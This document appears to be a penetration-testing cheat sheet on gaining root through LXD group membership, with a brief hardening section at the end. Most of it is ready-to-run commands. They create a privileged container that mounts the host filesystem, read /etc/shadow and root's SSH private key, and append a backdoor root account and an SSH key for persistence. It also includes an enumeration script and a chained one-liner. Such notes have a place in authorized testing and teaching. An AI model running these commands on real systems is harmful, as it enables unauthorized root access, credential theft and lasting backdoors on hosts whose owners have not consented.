LXD (Linux Daemon) container manager can be exploited for privilege escalation when user is member of lxd group through privileged container creation and host filesystem mounting.
# Check if user is in lxd group
id | grep lxd
groups | grep lxd
# Example output:
# uid=1000(user) gid=1000(user) groups=1000(user),116(lxd)# List available images
lxc image list
# If image exists, create privileged container
lxc init image_name privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/bash
# Access host filesystem as root
cd /mnt/root/root# If ubuntu-template.tar.xz or similar exists
lxc image import ubuntu-template.tar.xz --alias ubuntutemp
# Create privileged container
lxc init ubuntutemp privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/bash
# Root access to host filesystem
ls -la /mnt/root/# Download Alpine image
wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
chmod +x build-alpine
sudo ./build-alpine
# Import and use
lxc image import alpine*.tar.gz --alias alpine
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh# Initialize LXD (if not already done)
lxd init
# Use defaults for all prompts:
# - Storage pool: yes (dir)
# - Network: no
# - Bridge: yes (may fail, but proceed)# Inside privileged container
cd /mnt/root
# Access host root directory
cd /mnt/root/root
# Read sensitive files
cat /mnt/root/etc/shadow
cat /mnt/root/root/.ssh/id_rsa
# Create backdoor user on host
echo 'backdoor:$6$salt$hash:0:0:root:/root:/bin/bash' >> /mnt/root/etc/passwd
# Add SSH key for persistence
mkdir -p /mnt/root/root/.ssh
echo "ssh-rsa AAAA..." >> /mnt/root/root/.ssh/authorized_keys#!/bin/bash
echo "=== LXD PRIVILEGE ESCALATION CHECK ==="
echo "[+] LXD group membership:"
id | grep lxd && echo " [!] User is in lxd group!"
echo "[+] Available LXC images:"
lxc image list 2>/dev/null
echo "[+] Existing containers:"
lxc list 2>/dev/null
echo "[+] LXD service status:"
systemctl status lxd 2>/dev/null
echo "[+] Container templates in current directory:"
ls -la *.tar.* 2>/dev/null# Check if LXD is running
systemctl status lxd
ps aux | grep lxd
# Check LXD socket
ls -la /var/lib/lxd/
ls -la /var/snap/lxd/# Group membership
id | grep lxd
# Available resources
lxc image list
lxc list
ls -la *.tar.* # Local container images# If LXD group confirmed and image available
lxc init image_name root -c security.privileged=true
lxc config device add root host disk source=/ path=/mnt/root recursive=true
lxc start root
lxc exec root /bin/bash
cd /mnt/root/root# Complete LXD escalation (if alpine image exists)
lxc init alpine pwn -c security.privileged=true && lxc config device add pwn host disk source=/ path=/mnt/root recursive=true && lxc start pwn && lxc exec pwn /bin/sh && cd /mnt/root- Group membership automatically grants container privileges
- Privileged containers bypass security isolation
- Host filesystem access via device mounting
- No password required for lxd group members
# Remove users from lxd group
sudo deluser username lxd
# Disable LXD service if not needed
sudo systemctl disable lxd
sudo systemctl stop lxd
# Monitor LXD usage
journalctl -u lxdLXD group membership provides a direct path to root privileges through privileged container creation - the isolation boundary disappears when containers can mount the host filesystem with root access.